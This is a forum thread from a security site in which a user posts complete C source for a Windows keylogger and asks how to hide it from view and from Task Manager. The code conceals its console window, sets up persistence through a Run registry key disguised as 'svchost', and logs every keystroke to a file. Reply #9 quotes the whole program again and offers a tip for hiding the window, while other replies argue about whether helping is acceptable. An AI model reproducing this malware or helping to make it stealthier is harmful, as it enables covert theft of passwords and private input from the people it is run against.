Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Hidden Program

  1. #1
    Junior Member
    Join Date
    Jul 2004
    Posts
    19

    Hidden Program

    I have this keylogger in C++, curtosy of "lepricaun". It is a great program and works well but the only problem is that a black box, that looks like a dos session. If you exit out of the box, you quit the keylogger. Is there a way of making it hidden? Here is the code:


    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>

    #define BUFSIZE 80

    int test_key(void);
    int create_key(char *);
    int get_keys(void);


    int main(void)
    {
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
    char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
    create=create_key(path);

    }


    int t=get_keys();

    return t;
    }

    int get_keys(void)
    {
    short character;
    while(1)
    {

    for(character=8;character<=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("svchost.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    if(file!=NULL)
    {
    if((character>=39)&&(character<=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    else if((character>64)&&(character<91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("[`~]",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("[ ]} ]",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("['\"]",file);
    fclose(file);
    break;
    /*case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break;*/
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

    if((reg_key!=0)||(buf_length>BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }



    Also is there a way i can make it to where it is not on the task manager? If you can, please help me.

  2. #2
    Hoopy Frood
    Join Date
    Jun 2004
    Posts
    662
    Have you learned nothing from your previous posts? A question like this will only make you go into the Negative antipoints. Before your questions will be answered without flames and negs you will have to earn our respect so that we know that you mean no harm. Antionline is a site devoted to security and protecting against skiddies such as you seem to be. If you can't shape up and become a positive member, I cordially ask that you leave.

    Regards,
    Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  3. #3
    er0k
    Guest
    the only thing wrong with the post is that he reposted code.. which was just annoying. Poop > refer to lepricaun (sp?) 's post, they are having a discussing about your question in there.

  4. #4
    Hoopy Frood
    Join Date
    Jun 2004
    Posts
    662
    3 out of the 5 threads started by Poop deal with questionable activity. Don't you think we should be more wary about teaching him until we know his intent? Just my 2 cents.

    Regards,
    Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  5. #5
    Senior Member
    Join Date
    Apr 2004
    Posts
    1,024
    How/why is this questionable? The guy/kid/whatever is trying to get something that another member posted to work the way it is supposed to. If Poop gets negged for this, then leprican should get negged for making a keylogger and posting it on here.
    [H]ard|OCP <--Best hardware/gaming news out there--|
    pwned.nl <--Gamers will love this one --|
    Light a man a fire and you\'ll keep him warm for a day, Light a man ON fire and you\'ll keep him warm the rest of his life.

  6. #6
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Location
    Huson Mt.
    Posts
    1,752
    \"Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!\"
    Author Unknown

  7. #7
    I would have to agree with The Grunt. I would have to say poop has a point. I have never used a keylogger that hasn't run in the background or be hidden in the running processes.

    &lt;start bad pun&gt;'scripts don't hack systems, people hack systems'&lt;end bad pun&gt;

  8. #8
    Antionline is a site devoted to security and protecting against skiddies such as you seem to be. If you can't shape up and become a positive member, I cordially ask that you leave.
    And why is that? A keylogger is very much a big part of security.


    As for The_Grunt since when has posting code, been a bad thing? I personally think, it is bad not to post code.

    Why is it that posting a Keylogger is a bad thing?


    Please enlighten me.

    To the origional poster, when you have questions on code, if you can at all contact the person that wrote the code, that would be the wisest, course of action.

  9. #9

    Re: Hidden Program

    The problem might be as in what you think the code was written in... even though they use the same headers, the code is C, not C++... try compiling as KeyLogger.c, it should work as it was intended, without a cmd prompt open. It does for me and I only see it as a system process.

    Originally posted here by Poop782
    I have this keylogger in C++, curtosy of "lepricaun". It is a great program and works well but the only problem is that a black box, that looks like a dos session. If you exit out of the box, you quit the keylogger. Is there a way of making it hidden? Here is the code:


    #include &lt;windows.h&gt;
    #include &lt;stdio.h&gt;
    #include &lt;winuser.h&gt;

    #define BUFSIZE 80

    int test_key(void);
    int create_key(char *);
    int get_keys(void);


    int main(void)
    {
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
    char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
    create=create_key(path);

    }


    int t=get_keys();

    return t;
    }

    int get_keys(void)
    {
    short character;
    while(1)
    {

    for(character=8;character&lt;=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("svchost.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    if(file!=NULL)
    {
    if((character&gt;=39)&&(character&lt;=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    else if((character&gt;64)&&(character&lt;91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("[`~]",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("[ ]} ]",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("['\"]",file);
    fclose(file);
    break;
    /*case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break;*/
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

    if((reg_key!=0)||(buf_length&gt;BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }



    Also is there a way i can make it to where it is not on the task manager? If you can, please help me.

  10. #10
    Junior Member
    Join Date
    Jul 2004
    Posts
    19
    it didn't work, the box is still coming up and not going away

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •